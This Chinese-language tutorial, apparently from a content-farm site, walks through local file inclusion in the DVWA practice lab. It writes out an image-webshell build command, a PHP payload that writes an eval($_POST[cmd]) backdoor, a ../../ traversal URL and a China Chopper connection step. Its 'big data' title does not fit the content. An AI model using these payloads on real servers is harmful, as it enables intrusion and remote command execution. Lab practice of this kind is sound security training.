大数据中本地文件包含漏洞是怎样的

大数据中本地文件包含漏洞是怎样的,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。

一、本地文件包含漏洞:

环境:DVWA,low级别

1、制作一句话图片木马

第一种方法:

windows命令

copy 1.jpg/b+1.php 2.jpg

大数据中本地文件包含漏洞是怎样的

第二种方法:

将照片拖入edjpgcom软件,添加下面这句话

<?fputs(fopen("1.php","w"),'<?php eval($_POST[cmd]);?>')?>

大数据中本地文件包含漏洞是怎样的

2、上传图片木马文件

大数据中本地文件包含漏洞是怎样的

3、选择文件包含页面

大数据中本地文件包含漏洞是怎样的

4、执行文件包含并生成后门

192.168.152.188/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/1.jpg

大数据中本地文件包含漏洞是怎样的

5、在/var/www/dvwa/vulnerabilities/fi目录生成了1.php

大数据中本地文件包含漏洞是怎样的

6、菜刀链接

大数据中本地文件包含漏洞是怎样的

大数据中本地文件包含漏洞是怎样的

二、环境:DVWA,medium级别

同low级别

关于大数据中本地文件包含漏洞是怎样的问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注行业资讯频道了解更多相关知识。